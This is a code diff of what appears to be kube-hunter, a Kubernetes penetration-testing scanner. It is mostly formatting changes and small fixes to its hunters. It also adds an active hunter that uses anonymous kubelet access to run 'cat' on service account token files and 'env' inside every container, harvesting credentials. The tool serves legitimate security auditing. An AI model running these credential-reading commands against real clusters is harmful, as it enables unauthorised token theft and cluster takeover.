"rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "watch", "list"]}],
|
||||
}
|
||||
return self.create_item(
|
||||
path=f"{self.path}/apis/rbac.authorization.k8s.io/v1/namespaces/{namespace}/roles", data=json.dumps(role),
|
||||
path=f"{self.path}/apis/rbac.authorization.k8s.io/v1/namespaces/{namespace}/roles",
|
||||
data=json.dumps(role),
|
||||
)
|
||||
|
||||
def create_a_cluster_role(self):
|
||||
@@ -450,7 +502,8 @@ class AccessApiServerActive(ActiveHunter):
|
||||
"rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "watch", "list"]}],
|
||||
}
|
||||
return self.create_item(
|
||||
path=f"{self.path}/apis/rbac.authorization.k8s.io/v1/clusterroles", data=json.dumps(cluster_role),
|
||||
path=f"{self.path}/apis/rbac.authorization.k8s.io/v1/clusterroles",
|
||||
data=json.dumps(cluster_role),
|
||||
)
|
||||
|
||||
def delete_a_role(self, namespace, name):
|
||||
@@ -477,7 +530,8 @@ class AccessApiServerActive(ActiveHunter):
|
||||
def patch_a_cluster_role(self, cluster_role):
|
||||
data = [{"op": "add", "path": "/hello", "value": ["world"]}]
|
||||
return self.patch_item(
|
||||
path=f"{self.path}/apis/rbac.authorization.k8s.io/v1/clusterroles/{cluster_role}", data=json.dumps(data),
|
||||
path=f"{self.path}/apis/rbac.authorization.k8s.io/v1/clusterroles/{cluster_role}",
|
||||
data=json.dumps(data),
|
||||
)
|
||||
|
||||
def execute(self):
|
||||
|
||||
@@ -17,7 +17,11 @@ class PossibleArpSpoofing(Vulnerability, Event):
|
||||
|
||||
def __init__(self):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, "Possible Arp Spoof", category=IdentityTheft, vid="KHV020",
|
||||
self,
|
||||
KubernetesCluster,
|
||||
"Possible Arp Spoof",
|
||||
category=IdentityTheft,
|
||||
vid="KHV020",
|
||||
)
|
||||
|
||||
|
||||
@@ -39,7 +43,7 @@ class ArpSpoofHunter(ActiveHunter):
|
||||
def detect_l3_on_host(self, arp_responses):
|
||||
""" returns True for an existence of an L3 network plugin """
|
||||
logger.debug("Attempting to detect L3 network plugin using ARP")
|
||||
unique_macs = list(set(response[ARP].hwsrc for _, response in arp_responses))
|
||||
unique_macs = list({response[ARP].hwsrc for _, response in arp_responses})
|
||||
|
||||
# if LAN addresses not unique
|
||||
if len(unique_macs) == 1:
|
||||
@@ -55,7 +59,9 @@ class ArpSpoofHunter(ActiveHunter):
|
||||
config = get_config()
|
||||
self_ip = sr1(IP(dst="1.1.1.1", ttl=1) / ICMP(), verbose=0, timeout=config.network_timeout)[IP].dst
|
||||
arp_responses, _ = srp(
|
||||
Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=f"{self_ip}/24"), timeout=config.network_timeout, verbose=0,
|
||||
Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=f"{self_ip}/24"),
|
||||
timeout=config.network_timeout,
|
||||
verbose=0,
|
||||
)
|
||||
|
||||
# arp enabled on cluster and more than one pod on node
|
||||
|
||||
@@ -17,7 +17,10 @@ class CapNetRawEnabled(Event, Vulnerability):
|
||||
|
||||
def __init__(self):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name="CAP_NET_RAW Enabled", category=AccessRisk,
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="CAP_NET_RAW Enabled",
|
||||
category=AccessRisk,
|
||||
)
|
||||
|
||||
|
||||
|
||||
@@ -8,18 +8,24 @@ from kube_hunter.core.events import handler
|
||||
from kube_hunter.core.events.types import Vulnerability, Event, Service
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
email_pattern = re.compile(rb"([a-z0-9]+@[a-z0-9]+\.[a-z0-9]+)")
|
||||
email_pattern = re.compile(rb"([a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+)")
|
||||
|
||||
|
||||
class CertificateEmail(Vulnerability, Event):
|
||||
"""Certificate includes an email address"""
|
||||
"""The Kubernetes API Server advertises a public certificate for TLS.
|
||||
This certificate includes an email address, that may provide additional information for an attacker on your
|
||||
organization, or be abused for further email based attacks."""
|
||||
|
||||
def __init__(self, email):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, "Certificate Includes Email Address", category=InformationDisclosure, vid="KHV021",
|
||||
self,
|
||||
KubernetesCluster,
|
||||
"Certificate Includes Email Address",
|
||||
category=InformationDisclosure,
|
||||
vid="KHV021",
|
||||
)
|
||||
self.email = email
|
||||
self.evidence = "email: {}".format(self.email)
|
||||
self.evidence = f"email: {self.email}"
|
||||
|
||||
|
||||
@handler.subscribe(Service)
|
||||
@@ -42,7 +48,7 @@ class CertificateDiscovery(Hunter):
|
||||
self.examine_certificate(cert)
|
||||
|
||||
def examine_certificate(self, cert):
|
||||
c = cert.strip(ssl.PEM_HEADER).strip(ssl.PEM_FOOTER)
|
||||
c = cert.strip(ssl.PEM_HEADER).strip("\n").strip(ssl.PEM_FOOTER).strip("\n")
|
||||
certdata = base64.b64decode(c)
|
||||
emails = re.findall(email_pattern, certdata)
|
||||
for email in emails:
|
||||
|
||||
@@ -33,7 +33,7 @@ class ServerApiVersionEndPointAccessPE(Vulnerability, Event):
|
||||
|
||||
class ServerApiVersionEndPointAccessDos(Vulnerability, Event):
|
||||
"""Node not patched for CVE-2019-1002100. Depending on your RBAC settings,
|
||||
a crafted json-patch could cause a Denial of Service."""
|
||||
a crafted json-patch could cause a Denial of Service."""
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
@@ -52,7 +52,11 @@ class PingFloodHttp2Implementation(Vulnerability, Event):
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name="Possible Ping Flood Attack", category=DenialOfService, vid="KHV024",
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Possible Ping Flood Attack",
|
||||
category=DenialOfService,
|
||||
vid="KHV024",
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
@@ -63,7 +67,11 @@ class ResetFloodHttp2Implementation(Vulnerability, Event):
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name="Possible Reset Flood Attack", category=DenialOfService, vid="KHV025",
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Possible Reset Flood Attack",
|
||||
category=DenialOfService,
|
||||
vid="KHV025",
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
@@ -89,10 +97,14 @@ class IncompleteFixToKubectlCpVulnerability(Vulnerability, Event):
|
||||
|
||||
def __init__(self, binary_version):
|
||||
Vulnerability.__init__(
|
||||
self, KubectlClient, "Kubectl Vulnerable To CVE-2019-11246", category=RemoteCodeExec, vid="KHV027",
|
||||
self,
|
||||
KubectlClient,
|
||||
"Kubectl Vulnerable To CVE-2019-11246",
|
||||
category=RemoteCodeExec,
|
||||
vid="KHV027",
|
||||
)
|
||||
self.binary_version = binary_version
|
||||
self.evidence = "kubectl version: {}".format(self.binary_version)
|
||||
self.evidence = f"kubectl version: {self.binary_version}"
|
||||
|
||||
|
||||
class KubectlCpVulnerability(Vulnerability, Event):
|
||||
@@ -101,10 +113,14 @@ class KubectlCpVulnerability(Vulnerability, Event):
|
||||
|
||||
def __init__(self, binary_version):
|
||||
Vulnerability.__init__(
|
||||
self, KubectlClient, "Kubectl Vulnerable To CVE-2019-1002101", category=RemoteCodeExec, vid="KHV028",
|
||||
self,
|
||||
KubectlClient,
|
||||
"Kubectl Vulnerable To CVE-2019-1002101",
|
||||
category=RemoteCodeExec,
|
||||
vid="KHV028",
|
||||
)
|
||||
self.binary_version = binary_version
|
||||
self.evidence = "kubectl version: {}".format(self.binary_version)
|
||||
self.evidence = f"kubectl version: {self.binary_version}"
|
||||
|
||||
|
||||
class CveUtils:
|
||||
|
||||
@@ -16,7 +16,11 @@ class DashboardExposed(Vulnerability, Event):
|
||||
|
||||
def __init__(self, nodes):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, "Dashboard Exposed", category=RemoteCodeExec, vid="KHV029",
|
||||
self,
|
||||
KubernetesCluster,
|
||||
"Dashboard Exposed",
|
||||
category=RemoteCodeExec,
|
||||
vid="KHV029",
|
||||
)
|
||||
self.evidence = "nodes: {}".format(" ".join(nodes)) if nodes else None
|
||||
|
||||
|
||||
@@ -18,10 +18,14 @@ class PossibleDnsSpoofing(Vulnerability, Event):
|
||||
|
||||
def __init__(self, kubedns_pod_ip):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, "Possible DNS Spoof", category=IdentityTheft, vid="KHV030",
|
||||
self,
|
||||
KubernetesCluster,
|
||||
"Possible DNS Spoof",
|
||||
category=IdentityTheft,
|
||||
vid="KHV030",
|
||||
)
|
||||
self.kubedns_pod_ip = kubedns_pod_ip
|
||||
self.evidence = "kube-dns at: {}".format(self.kubedns_pod_ip)
|
||||
self.evidence = f"kube-dns at: {self.kubedns_pod_ip}"
|
||||
|
||||
|
||||
# Only triggered with RunningAsPod base event
|
||||
@@ -61,7 +65,9 @@ class DnsSpoofHunter(ActiveHunter):
|
||||
self_ip = dns_info_res[IP].dst
|
||||
|
||||
arp_responses, _ = srp(
|
||||
Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=f"{self_ip}/24"), timeout=config.network_timeout, verbose=0,
|
||||
Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=f"{self_ip}/24"),
|
||||
timeout=config.network_timeout,
|
||||
verbose=0,
|
||||
)
|
||||
for _, response in arp_responses:
|
||||
if response[Ether].src == kubedns_pod_mac:
|
||||
@@ -70,7 +76,7 @@ class DnsSpoofHunter(ActiveHunter):
|
||||
def execute(self):
|
||||
config = get_config()
|
||||
logger.debug("Attempting to get kube-dns pod ip")
|
||||
self_ip = sr1(IP(dst="1.1.1.1", ttl=1) / ICMP(), verbose=0, timeout=config.netork_timeout)[IP].dst
|
||||
self_ip = sr1(IP(dst="1.1.1.1", ttl=1) / ICMP(), verbose=0, timeout=config.network_timeout)[IP].dst
|
||||
cbr0_ip, cbr0_mac = self.get_cbr0_ip_mac()
|
||||
|
||||
kubedns = self.get_kube_dns_ip_mac()
|
||||
|
||||
@@ -26,7 +26,11 @@ class EtcdRemoteWriteAccessEvent(Vulnerability, Event):
|
||||
|
||||
def __init__(self, write_res):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name="Etcd Remote Write Access Event", category=RemoteCodeExec, vid="KHV031",
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Etcd Remote Write Access Event",
|
||||
category=RemoteCodeExec,
|
||||
vid="KHV031",
|
||||
)
|
||||
self.evidence = write_res
|
||||
|
||||
@@ -36,7 +40,11 @@ class EtcdRemoteReadAccessEvent(Vulnerability, Event):
|
||||
|
||||
def __init__(self, keys):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name="Etcd Remote Read Access Event", category=AccessRisk, vid="KHV032",
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Etcd Remote Read Access Event",
|
||||
category=AccessRisk,
|
||||
vid="KHV032",
|
||||
)
|
||||
self.evidence = keys
|
||||
|
||||
@@ -81,6 +89,7 @@ class EtcdRemoteAccessActive(ActiveHunter):
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
self.write_evidence = ""
|
||||
self.event.protocol = "https"
|
||||
|
||||
def db_keys_write_access(self):
|
||||
config = get_config()
|
||||
@@ -88,7 +97,7 @@ class EtcdRemoteAccessActive(ActiveHunter):
|
||||
data = {"value": "remotely written data"}
|
||||
try:
|
||||
r = requests.post(
|
||||
f"{self.protocol}://{self.event.host}:{ETCD_PORT}/v2/keys/message",
|
||||
f"{self.event.protocol}://{self.event.host}:{ETCD_PORT}/v2/keys/message",
|
||||
data=data,
|
||||
timeout=config.network_timeout,
|
||||
)
|
||||
@@ -113,14 +122,16 @@ class EtcdRemoteAccess(Hunter):
|
||||
self.event = event
|
||||
self.version_evidence = ""
|
||||
self.keys_evidence = ""
|
||||
self.protocol = "https"
|
||||
self.event.protocol = "https"
|
||||
|
||||
def db_keys_disclosure(self):
|
||||
config = get_config()
|
||||
logger.debug(f"{self.event.host} Passive hunter is attempting to read etcd keys remotely")
|
||||
try:
|
||||
r = requests.get(
|
||||
f"{self.protocol}://{self.eventhost}:{ETCD_PORT}/v2/keys", verify=False, timeout=config.network_timeout,
|
||||
f"{self.event.protocol}://{self.event.host}:{ETCD_PORT}/v2/keys",
|
||||
verify=False,
|
||||
timeout=config.network_timeout,
|
||||
)
|
||||
self.keys_evidence = r.content if r.status_code == 200 and r.content != "" else False
|
||||
return self.keys_evidence
|
||||
@@ -132,7 +143,7 @@ class EtcdRemoteAccess(Hunter):
|
||||
logger.debug(f"Trying to check etcd version remotely at {self.event.host}")
|
||||
try:
|
||||
r = requests.get(
|
||||
f"{self.protocol}://{self.event.host}:{ETCD_PORT}/version",
|
||||
f"{self.event.protocol}://{self.event.host}:{ETCD_PORT}/version",
|
||||
verify=False,
|
||||
timeout=config.network_timeout,
|
||||
)
|
||||
@@ -146,7 +157,9 @@ class EtcdRemoteAccess(Hunter):
|
||||
logger.debug(f"Trying to access etcd insecurely at {self.event.host}")
|
||||
try:
|
||||
r = requests.get(
|
||||
f"http://{self.event.host}:{ETCD_PORT}/version", verify=False, timeout=config.network_timeout,
|
||||
f"http://{self.event.host}:{ETCD_PORT}/version",
|
||||
verify=False,
|
||||
timeout=config.network_timeout,
|
||||
)
|
||||
return r.content if r.status_code == 200 and r.content else False
|
||||
except requests.exceptions.ConnectionError:
|
||||
@@ -154,10 +167,10 @@ class EtcdRemoteAccess(Hunter):
|
||||
|
||||
def execute(self):
|
||||
if self.insecure_access(): # make a decision between http and https protocol
|
||||
self.protocol = "http"
|
||||
self.event.protocol = "http"
|
||||
if self.version_disclosure():
|
||||
self.publish_event(EtcdRemoteVersionDisclosureEvent(self.version_evidence))
|
||||
if self.protocol == "http":
|
||||
if self.event.protocol == "http":
|
||||
self.publish_event(EtcdAccessEnabledWithoutAuthEvent(self.version_evidence))
|
||||
if self.db_keys_disclosure():
|
||||
self.publish_event(EtcdRemoteReadAccessEvent(self.keys_evidence))
|
||||
|
||||
@@ -1,10 +1,12 @@
|
||||
import json
|
||||
import logging
|
||||
import time
|
||||
from enum import Enum
|
||||
|
||||
import re
|
||||
import requests
|
||||
import urllib3
|
||||
import uuid
|
||||
|
||||
from kube_hunter.conf import get_config
|
||||
from kube_hunter.core.events import handler
|
||||
@@ -33,7 +35,7 @@ class ExposedPodsHandler(Vulnerability, Event):
|
||||
|
||||
def __init__(self, pods):
|
||||
Vulnerability.__init__(
|
||||
self, component=Kubelet, name="Exposed Pods", category=InformationDisclosure,
|
||||
self, component=Kubelet, name="Exposed Pods", category=InformationDisclosure, vid="KHV052"
|
||||
)
|
||||
self.pods = pods
|
||||
self.evidence = f"count: {len(self.pods)}"
|
||||
@@ -45,7 +47,11 @@ class AnonymousAuthEnabled(Vulnerability, Event):
|
||||
|
||||
def __init__(self):
|
||||
Vulnerability.__init__(
|
||||
self, component=Kubelet, name="Anonymous Authentication", category=RemoteCodeExec, vid="KHV036",
|
||||
self,
|
||||
component=Kubelet,
|
||||
name="Anonymous Authentication",
|
||||
category=RemoteCodeExec,
|
||||
vid="KHV036",
|
||||
)
|
||||
|
||||
|
||||
@@ -54,7 +60,11 @@ class ExposedContainerLogsHandler(Vulnerability, Event):
|
||||
|
||||
def __init__(self):
|
||||
Vulnerability.__init__(
|
||||
self, component=Kubelet, name="Exposed Container Logs", category=InformationDisclosure, vid="KHV037",
|
||||
self,
|
||||
component=Kubelet,
|
||||
name="Exposed Container Logs",
|
||||
category=InformationDisclosure,
|
||||
vid="KHV037",
|
||||
)
|
||||
|
||||
|
||||
@@ -64,10 +74,14 @@ class ExposedRunningPodsHandler(Vulnerability, Event):
|
||||
|
||||
def __init__(self, count):
|
||||
Vulnerability.__init__(
|
||||
self, component=Kubelet, name="Exposed Running Pods", category=InformationDisclosure, vid="KHV038",
|
||||
self,
|
||||
component=Kubelet,
|
||||
name="Exposed Running Pods",
|
||||
category=InformationDisclosure,
|
||||
vid="KHV038",
|
||||
)
|
||||
self.count = count
|
||||
self.evidence = "{} running pods".format(self.count)
|
||||
self.evidence = f"{self.count} running pods"
|
||||
|
||||
|
||||
class ExposedExecHandler(Vulnerability, Event):
|
||||
@@ -75,7 +89,11 @@ class ExposedExecHandler(Vulnerability, Event):
|
||||
|
||||
def __init__(self):
|
||||
Vulnerability.__init__(
|
||||
self, component=Kubelet, name="Exposed Exec On Container", category=RemoteCodeExec, vid="KHV039",
|
||||
self,
|
||||
component=Kubelet,
|
||||
name="Exposed Exec On Container",
|
||||
category=RemoteCodeExec,
|
||||
vid="KHV039",
|
||||
)
|
||||
|
||||
|
||||
@@ -84,7 +102,11 @@ class ExposedRunHandler(Vulnerability, Event):
|
||||
|
||||
def __init__(self):
|
||||
Vulnerability.__init__(
|
||||
self, component=Kubelet, name="Exposed Run Inside Container", category=RemoteCodeExec, vid="KHV040",
|
||||
self,
|
||||
component=Kubelet,
|
||||
name="Exposed Run Inside Container",
|
||||
category=RemoteCodeExec,
|
||||
vid="KHV040",
|
||||
)
|
||||
|
||||
|
||||
@@ -93,7 +115,11 @@ class ExposedPortForwardHandler(Vulnerability, Event):
|
||||
|
||||
def __init__(self):
|
||||
Vulnerability.__init__(
|
||||
self, component=Kubelet, name="Exposed Port Forward", category=RemoteCodeExec, vid="KHV041",
|
||||
self,
|
||||
component=Kubelet,
|
||||
name="Exposed Port Forward",
|
||||
category=RemoteCodeExec,
|
||||
vid="KHV041",
|
||||
)
|
||||
|
||||
|
||||
@@ -103,7 +129,11 @@ class ExposedAttachHandler(Vulnerability, Event):
|
||||
|
||||
def __init__(self):
|
||||
Vulnerability.__init__(
|
||||
self, component=Kubelet, name="Exposed Attaching To Container", category=RemoteCodeExec, vid="KHV042",
|
||||
self,
|
||||
component=Kubelet,
|
||||
name="Exposed Attaching To Container",
|
||||
category=RemoteCodeExec,
|
||||
vid="KHV042",
|
||||
)
|
||||
|
||||
|
||||
@@ -113,19 +143,43 @@ class ExposedHealthzHandler(Vulnerability, Event):
|
||||
|
||||
def __init__(self, status):
|
||||
Vulnerability.__init__(
|
||||
self, component=Kubelet, name="Cluster Health Disclosure", category=InformationDisclosure, vid="KHV043",
|
||||
self,
|
||||
component=Kubelet,
|
||||
name="Cluster Health Disclosure",
|
||||
category=InformationDisclosure,
|
||||
vid="KHV043",
|
||||
)
|
||||
self.status = status
|
||||
self.evidence = f"status: {self.status}"
|
||||
|
||||
|
||||
class ExposedExistingPrivilegedContainersViaSecureKubeletPort(Vulnerability, Event):
|
||||
"""A malicious actor, that has confirmed anonymous access to the API via the kubelet's secure port, \
|
||||
can leverage the existing privileged containers identified to damage the host and potentially \
|
||||
the whole cluster"""
|
||||
|
||||
def __init__(self, exposed_existing_privileged_containers):
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
component=KubernetesCluster,
|
||||
name="Exposed Existing Privileged Container(s) Via Secure Kubelet Port",
|
||||
category=AccessRisk,
|
||||
vid="KHV051",
|
||||
)
|
||||
self.exposed_existing_privileged_containers = exposed_existing_privileged_containers
|
||||
|
||||
|
||||
class PrivilegedContainers(Vulnerability, Event):
|
||||
"""A Privileged container exist on a node
|
||||
could expose the node/cluster to unwanted root operations"""
|
||||
|
||||
def __init__(self, containers):
|
||||
Vulnerability.__init__(
|
||||
self, component=KubernetesCluster, name="Privileged Container", category=AccessRisk, vid="KHV044",
|
||||
self,
|
||||
component=KubernetesCluster,
|
||||
name="Privileged Container",
|
||||
category=AccessRisk,
|
||||
vid="KHV044",
|
||||
)
|
||||
self.containers = containers
|
||||
self.evidence = f"pod: {containers[0][0]}, " f"container: {containers[0][1]}, " f"count: {len(containers)}"
|
||||
@@ -136,7 +190,11 @@ class ExposedSystemLogs(Vulnerability, Event):
|
||||
|
||||
def __init__(self):
|
||||
Vulnerability.__init__(
|
||||
self, component=Kubelet, name="Exposed System Logs", category=InformationDisclosure, vid="KHV045",
|
||||
self,
|
||||
component=Kubelet,
|
||||
name="Exposed System Logs",
|
||||
category=InformationDisclosure,
|
||||
vid="KHV045",
|
||||
)
|
||||
|
||||
|
||||
@@ -145,7 +203,11 @@ class ExposedKubeletCmdline(Vulnerability, Event):
|
||||
|
||||
def __init__(self, cmdline):
|
||||
Vulnerability.__init__(
|
||||
self, component=Kubelet, name="Exposed Kubelet Cmdline", category=InformationDisclosure, vid="KHV046",
|
||||
self,
|
||||
component=Kubelet,
|
||||
name="Exposed Kubelet Cmdline",
|
||||
category=InformationDisclosure,
|
||||
vid="KHV046",
|
||||
)
|
||||
self.cmdline = cmdline
|
||||
self.evidence = f"cmdline: {self.cmdline}"
|
||||
@@ -244,7 +306,7 @@ class SecureKubeletPortHunter(Hunter):
|
||||
""" all methods will return the handler name if successful """
|
||||
|
||||
def __init__(self, path, pod, session=None):
|
||||
self.path = path
|
||||
self.path = path + ("/" if not path.endswith("/") else "")
|
||||
self.session = session if session else requests.Session()
|
||||
self.pod = pod
|
||||
|
||||
@@ -252,7 +314,9 @@ class SecureKubeletPortHunter(Hunter):
|
||||
def test_container_logs(self):
|
||||
config = get_config()
|
||||
logs_url = self.path + KubeletHandlers.CONTAINERLOGS.value.format(
|
||||
pod_namespace=self.pod["namespace"], pod_id=self.pod["name"], container_name=self.pod["container"],
|
||||
pod_namespace=self.pod["namespace"],
|
||||
pod_id=self.pod["name"],
|
||||
container_name=self.pod["container"],
|
||||
)
|
||||
return self.session.get(logs_url, verify=False, timeout=config.network_timeout).status_code == 200
|
||||
|
||||
@@ -270,36 +334,46 @@ class SecureKubeletPortHunter(Hunter):
|
||||
return (
|
||||
"/cri/exec/"
|
||||
in self.session.get(
|
||||
exec_url, headers=headers, allow_redirects=False, verify=False, timeout=config.network_timeout,
|
||||
exec_url,
|
||||
headers=headers,
|
||||
allow_redirects=False,
|
||||
verify=False,
|
||||
timeout=config.network_timeout,
|
||||
).text
|
||||
)
|
||||
|
||||
# need further investigation on websockets protocol for further implementation
|
||||
def test_port_forward(self):
|
||||
config = get_config()
|
||||
headers = {
|
||||
"Upgrade": "websocket",
|
||||
"Connection": "Upgrade",
|
||||
"Sec-Websocket-Key": "s",
|
||||
"Sec-Websocket-Version": "13",
|
||||
"Sec-Websocket-Protocol": "SPDY",
|
||||
}
|
||||
pf_url = self.path + KubeletHandlers.PORTFORWARD.value.format(
|
||||
pod_namespace=self.pod["namespace"], pod_id=self.pod["name"], port=80,
|
||||
)
|
||||
self.session.get(
|
||||
pf_url, headers=headers, verify=False, stream=True, timeout=config.network_timeout,
|
||||
).status_code == 200
|
||||
pass
|
||||
# TODO: what to return?
|
||||
# Example starting code:
|
||||
#
|
||||
# config = get_config()
|
||||
# headers = {
|
||||
# "Upgrade": "websocket",
|
||||
# "Connection": "Upgrade",
|
||||
# "Sec-Websocket-Key": "s",
|
||||
# "Sec-Websocket-Version": "13",
|
||||
# "Sec-Websocket-Protocol": "SPDY",
|
||||
# }
|
||||
# pf_url = self.path + KubeletHandlers.PORTFORWARD.value.format(
|
||||
# pod_namespace=self.pod["namespace"],
|
||||
# pod_id=self.pod["name"],
|
||||
# port=80,
|
||||
# )
|
||||
|
||||
# executes one command and returns output
|
||||
def test_run_container(self):
|
||||
config = get_config()
|
||||
run_url = self.path + KubeletHandlers.RUN.value.format(
|
||||
pod_namespace="test", pod_id="test", container_name="test", cmd="",
|
||||
pod_namespace="test",
|
||||
pod_id="test",
|
||||
container_name="test",
|
||||
cmd="",
|
||||
)
|
||||
# if we get a Method Not Allowed, we know we passed Authentication and Authorization.
|
||||
return self.session.get(run_url, verify=False, timeout=config.network_timeout).status_code == 405
|
||||
# if we get this message, we know we passed Authentication and Authorization, and that the endpoint is enabled.
|
||||
status_code = self.session.post(run_url, verify=False, timeout=config.network_timeout).status_code
|
||||
return status_code == requests.codes.NOT_FOUND
|
||||
|
||||
# returns list of currently running pods
|
||||
def test_running_pods(self):
|
||||
@@ -321,7 +395,10 @@ class SecureKubeletPortHunter(Hunter):
|
||||
return (
|
||||
"/cri/attach/"
|
||||
in self.session.get(
|
||||
attach_url, allow_redirects=False, verify=False, timeout=config.network_timeout,
|
||||
attach_url,
|
||||
allow_redirects=False,
|
||||
verify=False,
|
||||
timeout=config.network_timeout,
|
||||
).text
|
||||
)
|
||||
|
||||
@@ -329,7 +406,8 @@ class SecureKubeletPortHunter(Hunter):
|
||||
def test_logs_endpoint(self):
|
||||
config = get_config()
|
||||
logs_url = self.session.get(
|
||||
self.path + KubeletHandlers.LOGS.value.format(path=""), timeout=config.network_timeout,
|
||||
self.path + KubeletHandlers.LOGS.value.format(path=""),
|
||||
timeout=config.network_timeout,
|
||||
).text
|
||||
return "<pre>" in logs_url
|
||||
|
||||
@@ -337,7 +415,9 @@ class SecureKubeletPortHunter(Hunter):
|
||||
def test_pprof_cmdline(self):
|
||||
config = get_config()
|
||||
cmd = self.session.get(
|
||||
self.path + KubeletHandlers.PPROF_CMDLINE.value, verify=False, timeout=config.network_timeout,
|
||||
self.path + KubeletHandlers.PPROF_CMDLINE.value,
|
||||
verify=False,
|
||||
timeout=config.network_timeout,
|
||||
)
|
||||
return cmd.text if cmd.status_code == 200 else None
|
||||
|
||||
@@ -349,7 +429,7 @@ class SecureKubeletPortHunter(Hunter):
|
||||
# self.session.cert = self.event.client_cert
|
||||
# copy session to event
|
||||
self.event.session = self.session
|
||||
self.path = "https://{self.event.host}:10250"
|
||||
self.path = f"https://{self.event.host}:10250"
|
||||
self.kubehunter_pod = {
|
||||
"name": "kube-hunter",
|
||||
"namespace": "default",
|
||||
@@ -425,7 +505,7 @@ class SecureKubeletPortHunter(Hunter):
|
||||
pod_data = next(filter(is_kubesystem_pod, pods_data), None)
|
||||
|
||||
if pod_data:
|
||||
container_data = next(pod_data["spec"]["containers"], None)
|
||||
container_data = pod_data["spec"]["containers"][0]
|
||||
if container_data:
|
||||
return {
|
||||
"name": pod_data["metadata"]["name"],
|
||||
@@ -434,6 +514,521 @@ class SecureKubeletPortHunter(Hunter):
|
||||
}
|
||||
|
||||
|
||||
""" Active Hunters """
|
||||
|
||||
|
||||
@handler.subscribe(AnonymousAuthEnabled)
|
||||
class ProveAnonymousAuth(ActiveHunter):
|
||||
"""Foothold Via Secure Kubelet Port
|
||||
Attempts to demonstrate that a malicious actor can establish foothold into the cluster via a
|
||||
container abusing the configuration of the kubelet's secure port: authentication-auth=false.
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
self.base_url = f"https://{self.event.host}:10250/"
|
||||
|
||||
def get_request(self, url, verify=False):
|
||||
config = get_config()
|
||||
try:
|
||||
response_text = self.event.session.get(url=url, verify=verify, timeout=config.network_timeout).text.rstrip()
|
||||
|
||||
return response_text
|
||||
except Exception as ex:
|
||||
logging.debug("Exception: " + str(ex))
|
||||
return "Exception: " + str(ex)
|
||||
|
||||
def post_request(self, url, params, verify=False):
|
||||
config = get_config()
|
||||
try:
|
||||
response_text = self.event.session.post(
|
||||
url=url, verify=verify, params=params, timeout=config.network_timeout
|
||||
).text.rstrip()
|
||||
|
||||
return response_text
|
||||
except Exception as ex:
|
||||
logging.debug("Exception: " + str(ex))
|
||||
return "Exception: " + str(ex)
|
||||
|
||||
@staticmethod
|
||||
def has_no_exception(result):
|
||||
return "Exception: " not in result
|
||||
|
||||
@staticmethod
|
||||
def has_no_error(result):
|
||||
possible_errors = ["exited with", "Operation not permitted", "Permission denied", "No such file or directory"]
|
||||
|
||||
return not any(error in result for error in possible_errors)
|
||||
|
||||
@staticmethod
|
||||
def has_no_error_nor_exception(result):
|
||||
return ProveAnonymousAuth.has_no_error(result) and ProveAnonymousAuth.has_no_exception(result)
|
||||
|
||||
def cat_command(self, run_request_url, full_file_path):
|
||||
return self.post_request(run_request_url, {"cmd": f"cat {full_file_path}"})
|
||||
|
||||
def process_container(self, run_request_url):
|
||||
service_account_token = self.cat_command(run_request_url, "/var/run/secrets/kubernetes.io/serviceaccount/token")
|
||||
|
||||
environment_variables = self.post_request(run_request_url, {"cmd": "env"})
|
||||
|
||||
if self.has_no_error_nor_exception(service_account_token):
|
||||
return {
|
||||
"result": True,
|
||||
"service_account_token": service_account_token,
|
||||
"environment_variables": environment_variables,
|
||||
}
|
||||
|
||||
return {"result": False}
|
||||
|
||||
def execute(self):
|
||||
pods_raw = self.get_request(self.base_url + KubeletHandlers.PODS.value)
|
||||
|
||||
# At this point, the following must happen:
|
||||
# a) we get the data of the running pods
|
||||
# b) we get a forbidden message because the API server
|
||||
# has a configuration that denies anonymous attempts despite the kubelet being vulnerable
|
||||
|
||||
if self.has_no_error_nor_exception(pods_raw) and "items" in pods_raw:
|
||||
pods_data = json.loads(pods_raw)["items"]
|
||||
|
||||
temp_message = ""
|
||||
exposed_existing_privileged_containers = list()
|
||||
|
||||
for pod_data in pods_data:
|
||||
pod_namespace = pod_data["metadata"]["namespace"]
|
||||
pod_id = pod_data["metadata"]["name"]
|
||||
|
||||
for container_data in pod_data["spec"]["containers"]:
|
||||
container_name = container_data["name"]
|
||||
|
||||
run_request_url = self.base_url + f"run/{pod_namespace}/{pod_id}/{container_name}"
|
||||
|
||||
extracted_data = self.process_container(run_request_url)
|
||||
|
||||
if extracted_data["result"]:
|
||||
service_account_token = extracted_data["service_account_token"]
|
||||
environment_variables = extracted_data["environment_variables"]
|
||||
|
||||
temp_message += (
|
||||
f"\n\nPod namespace: {pod_namespace}"
|
||||
+ f"\n\nPod ID: {pod_id}"
|
||||
